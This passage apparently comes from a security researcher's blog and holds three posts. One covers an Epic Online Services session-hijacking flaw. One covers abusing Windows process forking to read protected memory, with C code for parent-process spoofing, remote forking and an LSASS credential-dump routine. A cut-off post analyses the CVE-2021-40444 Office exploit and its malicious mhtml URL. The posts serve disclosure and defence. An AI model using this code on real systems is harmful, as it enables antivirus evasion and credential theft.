  2. Optional socket ID - This is a unique identifier for the specific socket to connect to. In common implementations of EOS, this is typically the randomly generated 32 character "session identifier".

Now that we know what data we need, the next step is understanding how the game itself shares these details between players.

One of the key features of the EOS Matchmaking/Session API we took a look at in a previous section is the existence of "Attributes", described by documentation to be a critical part of session discovery:

The most robust way to find sessions is to search based on a set of search parameters, which act as filters. Some parameters could be exposed to the user, such as enabling the user to select a certain game type or map, while others might be hidden, such as using the player's estimated skill level to find matches with appropriate opponents.

For peer-to-peer sessions, attributes are even more important, because they are the only way of carrying information about a session to other players. For a player to join another's peer-to-peer session, they need to retrieve the host's product user ID and an optional socket ID. Most implementations of Epic Online Services store this product user ID in the session's attributes. Of course, only clients with the GameServer role are allowed to create sessions and/or modify their attributes.

Exploitation: Session Hijacking

Recalling the first section, the core vulnerability and fundamental design flaw of EOS is that P2P games are required to embed GameServer credentials into their application. This means that, theoretically speaking, an attacker can create a fake session with any attribute values they'd like. This got me thinking: if attributes are the primary way clients find sessions to join, then with GameServer credentials we can effectively "duplicate" existing sessions and potentially hijack the session clients find when searching for the original session.

Sound confusing? It is! Let's talk through a real-world example.

One widely used implementation of Epic Online Services is the "OnlineSubsystemEOS" (EOS-OSS) included with the Unreal Engine. This plugin is a very popular implementation widely used by games such as Satisfactory.

In Satisfactory's use of EOS-OSS, they use an attribute named SES_CSS_SESSIONID to track sessions. For example, if a player wanted their friend to join directly, they could give their friend a session ID from their client which the friend would be able to use to join. When the session ID search is executed, all that's happening is a filter query against all sessions for that session ID attribute value. Once the session has been found, EOS-OSS joins the session by retrieving the required product user ID of the host through another session attribute named OWNINGPRODUCTID.

Since Satisfactory is a peer-to-peer game exclusively using the Epic Online Services API, an attacker can use the credentials embedded in the binary to get access to the GameServer role. With a GameServer token, an attacker can hijack existing sessions by creating several "duplicate" sessions that have the same session ID attribute but have the OWNINGPRODUCTID attribute set to their own product user ID.

When a victim executes a search for the session with the right session ID, more likely than not, the query will return one of the duplicated sessions that has the attacker's product user ID (ordering of sessions is random). Thus, when the victim attempts to join the game, they will join the attacker's game instead!
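
To make the mechanics concrete, here is a hypothetical sketch of the attack loop in C. Note that eos_create_duplicate_session() does not exist in the real EOS SDK; it is a stand-in for the raw EOS-API web requests an attacker would issue with a GameServer token:

/*
 * Hypothetical sketch of the duplicate-session attack described above.
 * eos_create_duplicate_session() is a stand-in for the raw EOS-API web
 * requests an attacker would issue; it is not a real EOS SDK function.
 */
extern void eos_create_duplicate_session(const char *token,
                                         const char *session_id,
                                         const char *owning_product_id);

void hijack_session(const char *game_server_token,
                    const char *victim_session_id,
                    const char *attacker_product_user_id)
{
    /* Flood matchmaking with copies of the victim's session that keep the
     * same SES_CSS_SESSIONID but point OWNINGPRODUCTID at the attacker.
     * A search for the session ID now most likely returns one of the
     * attacker's copies instead of the real session. */
    for (int i = 0; i < 50; i++)
        eos_create_duplicate_session(game_server_token,
                                     victim_session_id,          /* SES_CSS_SESSIONID */
                                     attacker_product_user_id);  /* OWNINGPRODUCTID */
}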

This attack is more severe than it may seem: it is trivial to script it to hijack all sessions at once, causing every player who joins any session to land in the attacker's session instead. To summarize, this fundamental design flaw allows attackers to:

  1. Hijack any or all "matchmaking sessions" and have any player that joins a session join an attacker's session instead.
  2. Prevent players from joining any "matchmaking session".

Remediation

When it comes to communication, Epic Games was one of the best vendors I have ever worked with. Epic Games consistently responded promptly, showed a high level of respect for my time, and was willing to extensively discuss the vulnerability. I can confidently say that the security team there is very competent and that I have no doubt of their skill. When it comes to actually "getting things done" and fixing these vulnerabilities, the response was questionable.

To my knowledge:

  1. Epic Games has partially* remediated the sensitive information disclosure vulnerability, opting to use a custom addressing format for peer-to-peer hosts instead of exposing their real IP Address in the ADDRESS session attribute.
  2. Epic Games has not remediated the session hijacking issue, however, they have released a new "Client Policy" mechanism, including a Peer2Peer policy intended for "untrusted client applications that want to host multiplayer matches". In practice, the only impact on the vulnerability is that there is now an extra layer of authentication: the attacker must be a user of the game (in contrast to only having client credentials). Epic Games has noted that they plan to "release additional tools to developers in future updates to the SDK, allowing them to further secure their products".

* If a new session does not set its own ADDRESS attribute, the EOS-API will automatically set their public IP Address as the ADDRESS attribute.

Instead of fixing the severe design flaw, Epic Games has opted to update their documentation with several warnings about how to use EOS correctly and to add trivial obstacles for an attacker (i.e., the user authentication now required for session hijacking). Regardless of these warnings, the vulnerability is still in full effect. Here is a list of the various notices Epic Games has placed in their documentation:

  1. In the documentation for the Session interface, Epic Games has placed several warnings all stating that attackers can leak the IP Address of a peer-to-peer host or server.
  2. Epic Games has created a brand new Matchmaking Security page which is a sub-page of the Session interface outlining:
  • Attackers may be able to access the IP Address and product user ID of a session host.
  • Attackers may be able to access any custom attributes set by game developers for a session.
  • Some "best practices" such as only expose information you need to expose.
  1. Epic Games has transitioned to a new Client Policy model for authentication, including policies for untrusted clients.

Can this really be fixed?

I'd like to give Epic Games every chance to explain themselves with these questionable remediation choices. Here is the statement they made after reviewing this article.

Regarding P2P matchmaking, the issues you’ve outlined are faced by nearly all service providers in the gaming industry - at its core P2P is inherently insecure. The EOS matchmaking implementation follows industry standard practices. It's ultimately up to developers to implement appropriate checks to best suit their product. As previously mentioned, we are always working to improve the security around our P2P policy and all of our other matchmaking policies.

Unfortunately, I have a lot of problems with this statement:

  1. Epic Games erroneously included the IP Address of peers in the session attributes, even though this information was never required in the first place. Exposing PII unnecessarily is certainly not an industry standard. At the end of the day, an attacker can likely figure out the IP of a client if they have their product user ID and socket ID, but Epic Games made it trivial for an attacker to enumerate and map an entire game's matchmaking system by including that unnecessary info.
  2. "The EOS matchmaking implementation follows industry standard practices": The only access control present is a single layer of authentication...
  3. Epic Games has yet to implement common mitigations such as rate-limiting.
  4. There are an insane number of ways to insecurely implement Epic Online Services and Epic Games has documented none of these cases or how to defend against them. A great example is when games like Satisfactory store sensitive information like a session ID in the session's attributes.
  5. The claim that the Session Hijacking issue cannot be remediated because "P2P is inherently insecure" is simply not true. The central EOS-API server is a trusted component, so access controls can be enforced there. Here is what Epic could do to remediate the Session Hijacking vulnerability:
  • A key requirement of the session hijacking attack is that the attacker can create multiple duplicate sessions matching the victim's attributes. An effective remediation is to limit the number of concurrent sessions a single user can have at once.
  • To prevent attackers from using multiple accounts to funnel victims into a single session, Epic Games could enforce that the product user ID stored in a session matches the product user ID of the token the client authenticated with.
  • To be clear, if Epic Games applied my suggested path of remediation, an attacker could still buy 10-20 copies of the game on different accounts to perform the attack on a small scale. A large-scale attack would require thousands of copies to create enough fake hijacking sessions.
  • The point with this path of remediation is that it would significantly reduce the exploitability of this vulnerability, much more than a single layer of authentication provides.

Epic Games has yet to comment on these suggestions.

But... why?

When I first came across the design flaw that peer-to-peer games are required to embed GameServer credentials, I was curious as to how such a fundamental flaw could have gotten past the initial design stage and decided to investigate.

After comparing the EOS landing page from its initial release in 2019 to the current page, it turns out that peer-to-peer functionality was not in the original release of Epic Online Services, but the GameClient and GameServer authentication model was!

It appears as though Epic Games simply didn't consider adding a new role dedicated for peer-to-peer hosts when designing the peer-to-peer functionality of the EOS-API.

Timeline

The timeline for this vulnerability is the following:

07/23/2020 - The vulnerability is reported to Epic Games.
07/28/2020 - The vulnerability is reproduced by HackerOne's triage team.
08/11/2020 - The vulnerability is officially triaged by Epic Games.
08/20/2020 - A disclosure timeline of 135 days is negotiated (for release in December 2020).
11/08/2020 - New impact/attack scenarios that are a result of this vulnerability are shared with Epic Games.
12/02/2020 - The vulnerability severity is escalated to Critical.
12/03/2020 - This publication is shared with Epic Games for review.
12/17/2020 - This publication is released to the public.

Frequently Asked Questions

Am I vulnerable?
If your game uses Epic Online Services, specifically its peer-to-peer or session/matchmaking functionality, you are likely vulnerable to some of the issues discussed in this article.

Epic Games has not remediated several of the issues discussed, opting to provide warnings in documentation instead of fixing the underlying problems in their platform.

What do I do if I am vulnerable?
If you're a player of the game, reach out to the game developers.

If you're a game or library developer, reach out to Epic Games for assistance. Make sure to review the documentation warnings Epic Games has added due to this vulnerability.

What is the potential impact of these vulnerabilities?
The vulnerabilities discussed in this article could be used to:

  1. Hijack any or all "matchmaking sessions" and have any player that joins a session join an attacker's session instead.
  2. Prevent players from joining any "matchmaking session".
  3. Leak the user identifier and IP Address of any player hosting a session.

Abusing Windows’ Implementation of Fork() for Stealthy Memory Operations

26 November 2021 at 04:32

Note: Another researcher recently tweeted about the technique discussed in this blog post; this is addressed in the last section of the blog (warning, spoilers!).

To access information about a running process, developers generally have to open a handle to the process through the OpenProcess API specifying a combination of 13 different process access rights:

  1. PROCESS_ALL_ACCESS - All possible access rights for a process.
  2. PROCESS_CREATE_PROCESS - Required to create a process.
  3. PROCESS_CREATE_THREAD - Required to create a thread.
  4. PROCESS_DUP_HANDLE - Required to duplicate a handle using DuplicateHandle.
  5. PROCESS_QUERY_INFORMATION - Required to retrieve general information about a process such as its token, exit code, and priority class.
  6. PROCESS_QUERY_LIMITED_INFORMATION - Required to retrieve certain limited information about a process.
  7. PROCESS_SET_INFORMATION - Required to set certain information about a process such as its priority.
  8. PROCESS_SET_QUOTA - Required to set memory limits using SetProcessWorkingSetSize.
  9. PROCESS_SUSPEND_RESUME - Required to suspend or resume a process.
  10. PROCESS_TERMINATE - Required to terminate a process using TerminateProcess.
  11. PROCESS_VM_OPERATION - Required to perform an operation on the address space of a process (VirtualProtectEx, WriteProcessMemory).
  12. PROCESS_VM_READ - Required to read memory in a process using ReadProcessMemory.
  13. PROCESS_VM_WRITE - Required to write memory in a process using WriteProcessMemory.

The access rights requested will impact whether or not a handle to the process is returned. For example, a normal process running under a standard user can open a SYSTEM process for querying basic information, but it cannot open that process with a privileged access right such as PROCESS_VM_READ.
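
For illustration, here is a minimal sketch of that asymmetry; systemPid is assumed to be the PID of a SYSTEM-owned process:

#include <windows.h>
#include <stdio.h>

void demo(DWORD systemPid)
{
    // Succeeds from a standard user: basic querying is broadly permitted.
    HANDLE hQuery = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, systemPid);

    // Fails with ERROR_ACCESS_DENIED: reading memory is a privileged right.
    HANDLE hRead = OpenProcess(PROCESS_VM_READ, FALSE, systemPid);

    printf("query: %p, read: %p (last error %lu)\n",
           hQuery, hRead, hRead ? 0 : GetLastError());

    if (hQuery) CloseHandle(hQuery);
    if (hRead)  CloseHandle(hRead);
}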

In the real world, the importance of process access rights can be seen in the restrictions anti-virus and anti-cheat products place on certain processes. An anti-virus might register a process handle create callback to prevent processes from opening the Local Security Authority Subsystem Service (LSASS) which could contain sensitive credentials in its memory. An anti-cheat might prevent processes from opening the game they are protecting, because cheaters can access key regions of the game memory to gain an unfair advantage.

When you look at the thirteen process access rights, do any of them strike you as potentially malicious? I investigated that question by taking a look at the drivers for several anti-virus products. Specifically, what access rights did they filter for in their process handle create callbacks? I came up with this subset of access rights that were often directly associated with potentially malicious operations: PROCESS_ALL_ACCESS, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, PROCESS_SET_INFORMATION, PROCESS_SUSPEND_RESUME, PROCESS_TERMINATE, PROCESS_VM_OPERATION, PROCESS_VM_READ, and PROCESS_VM_WRITE.

This leaves four other access rights that were discovered to be largely ignored:

  1. PROCESS_QUERY_INFORMATION - Required to retrieve general information about a process such as its token, exit code, and priority class.
  2. PROCESS_QUERY_LIMITED_INFORMATION - Required to retrieve certain limited information about a process.
  3. PROCESS_SET_QUOTA - Required to set memory limits using SetProcessWorkingSetSize.
  4. PROCESS_CREATE_PROCESS - Required to create a process.

These access rights were particularly interesting because if we could find a way to abuse any of them, we could potentially evade the detection of a majority of anti-virus products.

Most of these remaining rights cannot modify important aspects of a process. PROCESS_QUERY_INFORMATION and PROCESS_QUERY_LIMITED_INFORMATION are purely for reading informational details about a process. PROCESS_SET_QUOTA does impact the process, but does not provide much surface to abuse. For example, being able to set a process's performance limits provides limited usefulness in an attack.

What about PROCESS_CREATE_PROCESS? This access right allows a caller to "create a process" using the process handle, but what does that mean?

In practice, someone with a process handle containing this access right can create processes on behalf of that process. In the following sections, we will explore existing techniques that abuse this access right and its undiscovered potential.

Parent Process Spoofing

An existing evasion technique called "parent process ID spoofing" is used when a malicious application would like to create a child process under a different process. This allows an attacker to create a process while having it appear as if it was launched by another legitimate application.

At a high level, common implementations of parent process ID spoofing will (a minimal sketch follows this list):

  1. Call InitializeProcThreadAttributeList to initialize an attribute list for the child process.
  2. Use OpenProcess to obtain a PROCESS_CREATE_PROCESS handle to the fake parent process.
  3. Update the previously initialized attribute list with the parent process handle using UpdateProcThreadAttribute.
  4. Create the child process with CreateProcess, passing extended startup information containing the process attributes.
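
Here is a minimal sketch of those four steps (error handling trimmed for brevity):

#include <windows.h>

BOOL SpawnWithSpoofedParent(DWORD fakeParentPid, LPWSTR commandLine)
{
    // Step 2: open the fake parent with PROCESS_CREATE_PROCESS.
    HANDLE hParent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, fakeParentPid);
    if (hParent == NULL)
        return FALSE;

    // Step 1: initialize an attribute list with room for one attribute.
    SIZE_T size = 0;
    InitializeProcThreadAttributeList(NULL, 1, 0, &size);
    LPPROC_THREAD_ATTRIBUTE_LIST attrs =
        (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size);
    InitializeProcThreadAttributeList(attrs, 1, 0, &size);

    // Step 3: set the parent process attribute to the spoofed parent.
    UpdateProcThreadAttribute(attrs, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                              &hParent, sizeof(hParent), NULL, NULL);

    // Step 4: create the child with the extended startup information.
    STARTUPINFOEXW si = { 0 };
    si.StartupInfo.cb = sizeof(si);
    si.lpAttributeList = attrs;
    PROCESS_INFORMATION pi = { 0 };
    BOOL ok = CreateProcessW(NULL, commandLine, NULL, NULL, FALSE,
                             EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
                             &si.StartupInfo, &pi);

    DeleteProcThreadAttributeList(attrs);
    HeapFree(GetProcessHeap(), 0, attrs);
    CloseHandle(hParent);
    if (ok) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); }
    return ok;
}

Passing TRUE for the InheritHandles argument instead would hand the child every inheritable handle of the spoofed parent, which enables the handle-theft variation described below.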

This technique provides more usefulness than just being able to spoof the parent process of a child. It can be used to attack the parent process itself as well.

When creating a process, if the attacker specifies TRUE for the InheritHandles argument, all inheritable handles present in the parent process will be given to the child. For example, if a process has an inheritable thread handle and an attacker would like to obtain this handle indirectly, the attacker can abuse parent process spoofing to create their own malicious child process which inherits these handles.

The malicious child process would then be able to abuse these inherited handles in an attack against the parent process, such as a child using asynchronous procedure calls (APCs) on the parent's thread handle. Although this variation of the technique does require that the parent have critical handles set to be inheritable, several common applications, such as Firefox and Chrome, have inheritable thread handles.

Ways to Create Processes

The previous section explored one existing attack that used the high-level kernel32.dll function CreateProcess, but this is not the only way to create a process. Kernel32 provides abstractions such as CreateProcess which allow developers to avoid having to use ntdll functions directly.

When taking a look under the hood, kernel32 uses ntdll functions and does much of the heavy lifting required to perform NtXx calls. CreateProcess uses NtCreateUserProcess, which has the following function prototype:

NTSTATUS NTAPI
NtCreateUserProcess (
    PHANDLE ProcessHandle,
    PHANDLE ThreadHandle,
    ACCESS_MASK ProcessDesiredAccess,
    ACCESS_MASK ThreadDesiredAccess,
    POBJECT_ATTRIBUTES ProcessObjectAttributes,
    POBJECT_ATTRIBUTES ThreadObjectAttributes,
    ULONG ProcessFlags,
    ULONG ThreadFlags,
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
    PPROCESS_CREATE_INFO CreateInfo,
    PPROCESS_ATTRIBUTE_LIST AttributeList
    );

NtCreateUserProcess is not the only low-level function exposed to create processes. There are two legacy alternatives: NtCreateProcess and NtCreateProcessEx. Their function prototypes are:

NTSTATUS NTAPI
NtCreateProcess (
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    BOOLEAN InheritObjectTable,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort
    );

NTSTATUS NTAPI
NtCreateProcessEx (
    PHANDLE ProcessHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ParentProcess,
    ULONG Flags,
    HANDLE SectionHandle,
    HANDLE DebugPort,
    HANDLE ExceptionPort,
    BOOLEAN InJob
    );

NtCreateProcess and NtCreateProcessEx are quite similar but offer a different route of process creation when compared to NtCreateUserProcess.

Forking Your Own Process

A lesser-documented (and limited) technique available to developers is the ability to fork processes on Windows. The undocumented function developers can use to fork their own process is RtlCloneUserProcess. This function does not call the kernel directly and instead is a wrapper around NtCreateUserProcess.

A minimal implementation of forking through NtCreateUserProcess can be achieved trivially. By calling NtCreateUserProcess with NULL for both object attribute arguments, NULL for the process parameters, an empty (but not NULL) create info argument, and a NULL attribute list, a fork of the current process will be created.
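
As a concrete sketch of that minimal implementation, using the prototype shown earlier: the PS_CREATE_INFO definition below is a stand-in sized to match the structure's publicly documented x64 layout (see reversing references such as phnt for the full definition), and the child's return status is as publicly reported:

#include <windows.h>
#include <winternl.h>
#include <stdio.h>

// Stand-in for the real PS_CREATE_INFO: only Size must be set by the caller,
// and the kernel fills in the rest. 0x58 bytes on x64 per public references.
typedef struct _PS_CREATE_INFO {
    SIZE_T    Size;
    ULONG     State;
    ULONGLONG Reserved[9];
} PS_CREATE_INFO, *PPS_CREATE_INFO;

typedef NTSTATUS (NTAPI *NtCreateUserProcess_t)(
    PHANDLE ProcessHandle, PHANDLE ThreadHandle,
    ACCESS_MASK ProcessDesiredAccess, ACCESS_MASK ThreadDesiredAccess,
    POBJECT_ATTRIBUTES ProcessObjectAttributes,
    POBJECT_ATTRIBUTES ThreadObjectAttributes,
    ULONG ProcessFlags, ULONG ThreadFlags,
    PVOID ProcessParameters, PPS_CREATE_INFO CreateInfo, PVOID AttributeList);

int main(void)
{
    NtCreateUserProcess_t NtCreateUserProcess = (NtCreateUserProcess_t)
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtCreateUserProcess");

    PS_CREATE_INFO createInfo = { 0 };
    createInfo.Size = sizeof(createInfo);   // empty, but not NULL

    HANDLE hProcess = NULL, hThread = NULL;
    NTSTATUS status = NtCreateUserProcess(
        &hProcess, &hThread,
        PROCESS_ALL_ACCESS, THREAD_ALL_ACCESS,
        NULL, NULL,     // no process/thread object attributes
        0, 0,           // no process/thread creation flags
        NULL,           // NULL process parameters -> fork the caller
        &createInfo,
        NULL);          // no attribute list

    // The parent receives handles to the fork; the child reportedly wakes up
    // inside this same call with the distinct status STATUS_PROCESS_CLONED.
    printf("status: 0x%08lX, fork handle: %p\n", status, hProcess);
    return 0;
}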

One question that arose when performing this research was: what is the difference between forking a process and creating a new process with handles inherited? Interestingly, the minimal forking mechanism present in Windows includes not only inheritable handles, but private memory regions too. Any pages the parent dynamically allocated will be accessible at the same addresses in the child as well.

Both RtlCloneUserProcess and the minimal implementation described are publicly known techniques for simulating fork on Windows, but what use does forking provide to an attacker?

In 2019, Microsoft Research Labs published a paper named "A fork() in the road", which discussed how what used to be a "clever hack" has "long outlived its usefulness and is now a liability". The paper discusses several areas, such as how fork is a "terrible abstraction" and how it compromises OS implementations. The section titled "FORK IN THE MODERN ERA" is particularly relevant:

Fork is insecure. By default, a forked child inherits everything from its parent, and the programmer is responsible for explicitly removing state that the child does not need by: closing file descriptors (or marking them as close-on-exec), scrubbing secrets from memory, isolating namespaces using unshare() [52], etc. From a security perspective, the inherit by-default behaviour of fork violates the principle of least privilege.

This section covers the security risk that is posed by the ability to fork processes. Microsoft provides the example that a forked process "inherits everything from its parent" and that "the programmer is responsible for explicitly removing state that the child does not need". What happens when the programmer is a malicious attacker?

Forking a Remote Process

I propose a new method of abusing the limited fork functionality present in Windows. Instead of forking your own process, what if you forked a remote process? If an attacker could fork a remote process, they would be able to gain insight into the target process without needing a sensitive process access right such as PROCESS_VM_READ, which could be monitored by anti-virus.

With only a PROCESS_CREATE_PROCESS handle, an attacker can fork or "duplicate" a process and access any secrets that are present in it. When using the legacy NtCreateProcess(Ex) variant, forking a remote process is relatively simple.

By passing NULL for the SectionHandle and a PROCESS_CREATE_PROCESS handle of the target for the ParentProcess arguments, a fork of the remote process will be created and an attacker will receive a handle to the forked process. Additionally, as long as the attacker does not create any threads, no process creation callbacks will fire. This means that an attacker could read the sensitive memory of the target and anti-virus wouldn't even know that the child process had been created.
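
A minimal sketch of that legacy route, with NtCreateProcessEx resolved dynamically since it is not exposed in any SDK header (the flag and access-mask choices here are assumptions consistent with public write-ups of the technique):

#include <windows.h>
#include <winternl.h>

#define NT_SUCCESS(s) (((NTSTATUS)(s)) >= 0)

typedef NTSTATUS (NTAPI *NtCreateProcessEx_t)(
    PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ParentProcess,
    ULONG Flags, HANDLE SectionHandle, HANDLE DebugPort,
    HANDLE ExceptionPort, BOOLEAN InJob);

// Fork a remote process given only a PROCESS_CREATE_PROCESS handle.
HANDLE ForkRemoteProcess(DWORD targetPid)
{
    NtCreateProcessEx_t NtCreateProcessEx = (NtCreateProcessEx_t)
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtCreateProcessEx");

    HANDLE hTarget = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, targetPid);
    if (hTarget == NULL)
        return NULL;

    HANDLE hFork = NULL;
    NTSTATUS status = NtCreateProcessEx(
        &hFork,
        PROCESS_ALL_ACCESS,
        NULL,        // no object attributes
        hTarget,     // ParentProcess: the victim we hold the handle to
        0,           // no flags; handle inheritance is not needed for memory
        NULL,        // SectionHandle = NULL -> copy the parent's address space
        NULL, NULL, FALSE);

    CloseHandle(hTarget);
    return NT_SUCCESS(status) ? hFork : NULL;
}

Because no thread is ever created in the fork, process creation callbacks never fire, and the returned handle can be read with ReadProcessMemory like a handle to any process the caller owns.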

When using the modern NtCreateUserProcess variant, all an attacker needs to do is use the previous minimal implementation of forking your own process but pass the target process handle as a PsAttributeParentProcess in the attribute list.

With the child handle, an attacker could read sensitive memory from the target application for a variety of purposes. In the following sections, we'll cover approaches to detection and an example of how an attacker could abuse this in a real attack.

Example: Anti-Virus Tampering

Some commercial anti-virus solutions may include self-integrity features designed to combat tampering and information disclosure. If an attacker could access the memory of the anti-virus process, it is possible that sensitive information about the system or the anti-virus itself could be abused.

With Process Forking, an attacker can gain access to both private memory and inheritable handles with only a PROCESS_CREATE_PROCESS handle to the victim process. A few examples of attacks include:

  1. An attacker could read the encryption keys that are used to communicate with a trusted anti-virus server to decrypt or potentially tamper with this line of communication. For example, an attacker could pose as a man-in-the-middle (MiTM) with these encryption keys to prevent the anti-virus client from communicating alerts or spoof server responses to further tamper with the client.
  2. An attacker could gain access to sensitive information about the system that was provided by the kernel. This information could include data from kernel callbacks that an attacker otherwise would not have access to from usermode.
  3. An attacker could gain access to any handle the anti-virus process holds that is marked as inheritable. For example, if the anti-virus protects certain files from being accessed, such as sensitive configuration files, an attacker may be able to inherit a handle opened by the anti-virus process itself to access that protected file.

Example: Credential Dumping

One obvious target for a stealthy memory reading technique such as this is the Local Security Authority Subsystem Service (LSASS). LSASS is often the target of attackers that wish to capture the credentials for the current machine.

In a typical attack, a malicious program such as Mimikatz directly interfaces with LSASS on the victim machine; a stealthier alternative, however, has been to dump the memory of LSASS for processing on an attacker-controlled machine. This avoids putting a well-known malicious program such as Mimikatz in the victim environment, where it is much more likely to be detected.

With Process Forking, an attacker can evade defensive solutions that monitor or prevent access to the LSASS process by dumping the memory of an LSASS fork instead, as sketched after this list:

  1. Set debug privileges for your current process if you are not already running as SYSTEM.
  2. Open a file to write the memory dump to.
  3. Create a fork child of LSASS.
  4. Use the common MiniDumpWriteDump API on the forked child.
  5. Exfiltrate the dump file to an attacker machine for further processing.
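
A sketch of those steps, reusing the ForkRemoteProcess helper from the earlier sketch (dbghelp's MiniDumpWriteDump is a documented API; enabling SeDebugPrivilege and looking up the LSASS PID are left to the caller):

#include <windows.h>
#include <dbghelp.h>
#pragma comment(lib, "dbghelp.lib")

HANDLE ForkRemoteProcess(DWORD targetPid); // from the earlier sketch

BOOL DumpLsassFork(DWORD lsassPid, LPCWSTR dumpPath)
{
    // Step 3: fork LSASS instead of opening it with PROCESS_VM_READ.
    HANDLE hFork = ForkRemoteProcess(lsassPid);
    if (hFork == NULL)
        return FALSE;

    // Step 2: the file that will receive the dump.
    HANDLE hFile = CreateFileW(dumpPath, GENERIC_WRITE, 0, NULL,
                               CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        TerminateProcess(hFork, 0);
        CloseHandle(hFork);
        return FALSE;
    }

    // Step 4: dump the frozen fork; defensive hooks watching for handles to
    // the real LSASS process never see this access.
    BOOL ok = MiniDumpWriteDump(hFork, GetProcessId(hFork), hFile,
                                MiniDumpWithFullMemory, NULL, NULL, NULL);

    CloseHandle(hFile);
    TerminateProcess(hFork, 0);   // clean up the fork
    CloseHandle(hFork);
    return ok;
}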

Proof of Concept

A simple proof-of-concept utility and library have been published on GitHub.

Conclusion

Process Forking still requires that an attacker would have access to the victim process in the default Windows security model. Process Forking does not break integrity boundaries and attackers are restricted to processes running at the same privilege level they are. What Process Forking does offer is a largely ignored alternative to handle rights that are known to be potentially malicious.

Remediation may be difficult depending on the context of the solution relying on handle callbacks. An anti-cheat defending a single process may be able to get away with stripping PROCESS_CREATE_PROCESS handles entirely, but anti-virus solutions protecting multiple processes attempting a similar fix could face compatibility issues. It is recommended that vendors who opt to strip this access right initially audit its usage within customer environments and limit the processes they protect as much as possible.

Didn't I see this on Twitter yesterday?

Did you know that it is possible to read memory using a PROCESS_CREATE_PROCESS handle? Just call NtCreateProcessEx to clone the target process (and its entire address space), and then read anything you want from there.😎

— diversenok (@diversenok_zero) November 25, 2021

Yesterday morning, I saw this interesting tweet from @diversenok_zero explaining the same method discussed in this blog post.

One approach I like to take with new research or methods I find that I haven't investigated thoroughly yet is to generate a SHA256 hash of the idea and then post it somewhere publicly where the timestamp is recorded. This way, in cases like this where my research conflicts with what another researcher was working on, I can always prove I discovered the trick on a certain date. In this case, on June 19th 2021, I posted a public GitHub gist of the following SHA256 hash:

D779D38405E8828F5CB27C2C3D75867C6A9AA30E0BD003FECF0401BFA6F9C8C7
You can read the memory of any process that you can open a PROCESS_CREATE_PROCESS handle to by calling NtCreateProcessEx using the process handle as the ParentHandle argument and providing NULL for the section argument.

If you generate a SHA256 hash of the quote above, you'll notice it matches the one I publicly posted back in June.

I have been waiting to publish this research because I am currently in the process of responsibly disclosing the issue to vendors whose products are impacted by this attack. Since the core theory of my research was shared publicly by @diversenok_zero, I decided it would be alright to share what I found around the technique as well.

Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit

7 January 2022 at 09:18

In the middle of August 2021, a special Word document was uploaded to VirusTotal by a user from Argentina. Although it was only detected by a single antivirus engine at the time, this sample turned out to be exploiting a zero day vulnerability in Microsoft Office to gain remote code execution.

Three weeks later, Microsoft published an advisory after being notified of the exploit by researchers from Mandiant and EXPMON. It took Microsoft nearly a month from the time the exploit was first uploaded to VirusTotal to publish a patch for the zero day.

In this blog post, I will be sharing my in-depth analysis of the several vulnerabilities abused by the attackers, how the exploit was patched, and how to port the exploit for a generic Internet Explorer environment.

First Look

A day after Microsoft published their advisory, I saw a tweet from the malware collection group @vxunderground offering a malicious payload for CVE-2021-40444 to blue/red teams.

I reached out to receive a copy, because why not? My curiosity has generally led me in the right direction in life, and I was interested in seeing a Microsoft Word exploit that had been found in the wild.

With the payload in hand, one of the first steps I took was placing it into an isolated virtual machine with basic dynamic analysis tooling. Specifically, one of my favorite network monitoring utilities is Fiddler, a freemium tool that allows you to intercept web requests (including encrypted HTTPS traffic).

After I opened the malicious Word document, Fiddler immediately captured strange HTTP requests to the domain, "hidusi[.]com". For some reason, the Word document was making a request to "http://hidusi[.]com/e8c76295a5f9acb7/side.html".

At this point, the "hidusi[.]com" domain was already taken down. Fortunately, the "side.html" file being requested was included with the sample that was shared with me.

Unfortunately, the HTML file was largely filled with obfuscated JavaScript. Although I could have immediately deobfuscated this JavaScript and worked from there, doing so at such an early stage is generally a bad idea, because we have no understanding of the exploit yet.

Reproduction

Whenever I encounter a new vulnerability that I want to reverse engineer, my first goal is always to produce a minimal reproduction example of the exploit to ensure I have a working test environment and a basic understanding of how the exploit works. Having a reproduction case is critical to reverse engineering how the bug works, because it allows for dynamic analysis.

Since the original "hidusi[.]com" domain was down, we needed to host our version of side.html. Hosting a file is easy, but how do we make the Word document use our domain instead? It was time to find where the URL to side.html was hidden inside the Word document.

[Image: Raw Bytes of "A Letter before court 4.docx"]
[Image: Extracted Contents of "A Letter before court 4.docx"]

Did you know that Office documents are just ZIP files? As we can see from the bytes of the malicious document, the first few bytes are simply the magic value in the ZIP header.

Once I extracted the document as a ZIP, finding the URL was relatively easy. I performed a string search across every file the document contained for the domain "hidusi[.]com".

[Image: Hidusi[.]com found under word/_rels/document.xml.rels]

Sure enough, I found one match inside the file "word/_rels/document.xml.rels". This file is responsible for defining relationships associated with embedded objects in the document.

OLE objects are part of Microsoft's proprietary Object Linking and Embedding technology, which allows external documents, such as an Excel spreadsheet, to be embedded within a Word document.

[Image: Strange Target for OLE Object]

The relationship that contained the malicious URL was an external OLE object with a strange "Target" attribute containing the "mhtml" protocol. The full value looked roughly like "mhtml:http://hidusi[.]com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi[.]com/e8c76295a5f9acb7/side.html". Let's unpack what's going on in this value.

  1. First, the URL protocol "mhtml".
  2. Next, the malicious URL our proxy caught.
